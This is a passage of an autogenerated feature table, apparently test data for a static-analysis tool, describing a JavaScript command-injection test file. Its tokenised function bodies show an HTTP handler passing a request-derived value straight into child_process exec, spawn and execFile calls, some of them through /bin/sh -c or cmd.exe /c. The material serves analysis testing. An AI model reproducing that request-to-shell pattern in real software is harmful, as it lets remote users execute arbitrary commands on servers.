cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:17:8:17:11 | exec | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:17:8:17:11 | exec | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:17:13:17:15 | cmd | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:17:13:17:15 | cmd | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:17:13:17:15 | cmd | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:17:13:17:15 | cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:17:13:17:15 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:17:13:17:15 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:17:13:17:15 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:17:13:17:15 | cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:17:13:17:15 | cmd | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:18:5:18:6 | cp | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:18:5:18:6 | cp | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:18:5:18:6 | cp | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:18:5:18:6 | cp | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:18:5:18:6 | cp | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:18:5:18:15 | cp.execSync | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:18:5:18:15 | cp.execSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:18:5:18:15 | cp.execSync | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:18:5:18:15 | cp.execSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:18:5:18:15 | cp.execSync | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:18:5:18:20 | cp.execSync(cmd) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:18:5:18:20 | cp.execSync(cmd) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:18:5:18:20 | cp.execSync(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:18:5:18:20 | cp.execSync(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:18:5:18:20 | cp.execSync(cmd) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:18:5:18:20 | exceptional return of cp.execSync(cmd) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:18:5:18:20 | exceptional return of cp.execSync(cmd) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:18:5:18:20 | exceptional return of cp.execSync(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:18:5:18:20 | exceptional return of cp.execSync(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:18:5:18:20 | exceptional return of cp.execSync(cmd) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:18:8:18:15 | execSync | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:18:8:18:15 | execSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:18:8:18:15 | execSync | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:18:8:18:15 | execSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:18:8:18:15 | execSync | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:18:17:18:19 | cmd | CalleeFlexibleAccessPath | cp.execSync | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:18:17:18:19 | cmd | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:18:17:18:19 | cmd | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:18:17:18:19 | cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:18:17:18:19 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:18:17:18:19 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:18:17:18:19 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:18:17:18:19 | cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:18:17:18:19 | cmd | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:19:5:19:6 | cp | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:19:5:19:6 | cp | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:19:5:19:6 | cp | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:19:5:19:6 | cp | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:19:5:19:6 | cp | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:19:5:19:15 | cp.execFile | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:19:5:19:15 | cp.execFile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:19:5:19:15 | cp.execFile | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:19:5:19:15 | cp.execFile | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:19:5:19:15 | cp.execFile | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:19:5:19:20 | cp.execFile(cmd) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:19:5:19:20 | cp.execFile(cmd) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:19:5:19:20 | cp.execFile(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:19:5:19:20 | cp.execFile(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:19:5:19:20 | cp.execFile(cmd) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:19:5:19:20 | exceptional return of cp.execFile(cmd) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:19:5:19:20 | exceptional return of cp.execFile(cmd) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:19:5:19:20 | exceptional return of cp.execFile(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:19:5:19:20 | exceptional return of cp.execFile(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:19:5:19:20 | exceptional return of cp.execFile(cmd) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:19:8:19:15 | execFile | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:19:8:19:15 | execFile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:19:8:19:15 | execFile | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:19:8:19:15 | execFile | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:19:8:19:15 | execFile | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:19:17:19:19 | cmd | CalleeFlexibleAccessPath | cp.execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:19:17:19:19 | cmd | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:19:17:19:19 | cmd | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:19:17:19:19 | cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:19:17:19:19 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:19:17:19:19 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:19:17:19:19 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:19:17:19:19 | cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:19:17:19:19 | cmd | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:20:5:20:6 | cp | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:20:5:20:6 | cp | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:20:5:20:6 | cp | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:20:5:20:6 | cp | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:20:5:20:6 | cp | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:20:5:20:19 | cp.execFileSync | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:20:5:20:19 | cp.execFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:20:5:20:19 | cp.execFileSync | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:20:5:20:19 | cp.execFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:20:5:20:19 | cp.execFileSync | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:20:5:20:24 | cp.execFileSync(cmd) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:20:5:20:24 | cp.execFileSync(cmd) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:20:5:20:24 | cp.execFileSync(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:20:5:20:24 | cp.execFileSync(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:20:5:20:24 | cp.execFileSync(cmd) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:20:5:20:24 | exceptional return of cp.execFileSync(cmd) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:20:5:20:24 | exceptional return of cp.execFileSync(cmd) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:20:5:20:24 | exceptional return of cp.execFileSync(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:20:5:20:24 | exceptional return of cp.execFileSync(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:20:5:20:24 | exceptional return of cp.execFileSync(cmd) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:20:8:20:19 | execFileSync | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:20:8:20:19 | execFileSync | contextSurroundingFunctionParameters | (req, res) | +| 